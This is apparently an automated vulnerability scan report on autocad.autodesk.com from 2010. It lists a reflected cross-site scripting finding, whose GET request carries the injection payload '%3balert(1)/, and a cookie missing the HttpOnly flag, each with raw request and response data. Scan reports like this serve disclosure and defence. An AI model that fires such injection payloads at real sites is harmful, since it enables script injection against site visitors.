1. Cross-site scripting (reflected)
2. Cookie without HttpOnly flag set
Severity: | High |
Confidence: | Certain |
Host: | http://autocad.autodesk |
Path: | / |
GET /?62ebe'%3balert(1)/ Host: autocad.autodesk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close |
HTTP/1.1 200 OK connection: close content-type: text/html; charset=UTF-8 date: Fri, 12 Nov 2010 04:14:55 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: Apache/2.2.3 (Red Hat) vary: Accept-Encoding Set-Cookie: uuid=12716910351316; Path=/; Expires=Fri, 11 Nov 2011 20:14:55 UTC Set-Cookie: day=1; Path=/ Set-Cookie: agent=local; Path=/; Expires=Sun, 26 Dec 2010 20:14:55 UTC Set-Cookie: LB-INFO=1669538570.20480 Set-Cookie: LB-INFO-WS=1229005578 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="C ...[SNIP]... <script> if( document.location document.location.replace } </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://autocad.autodesk |
Path: | / |
GET / HTTP/1.1 Host: autocad.autodesk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close |
HTTP/1.1 200 OK connection: close content-type: text/html; charset=UTF-8 date: Fri, 12 Nov 2010 04:14:49 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: Apache/2.2.3 (Red Hat) vary: Accept-Encoding Set-Cookie: uuid=12716910351316; Path=/; Expires=Fri, 11 Nov 2011 20:14:49 UTC Set-Cookie: day=1; Path=/ Set-Cookie: agent=local; Path=/; Expires=Sun, 26 Dec 2010 20:14:49 UTC Set-Cookie: LB-INFO=1686315786.20480 Set-Cookie: LB-INFO-WS=1195451146 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="C ...[SNIP]... |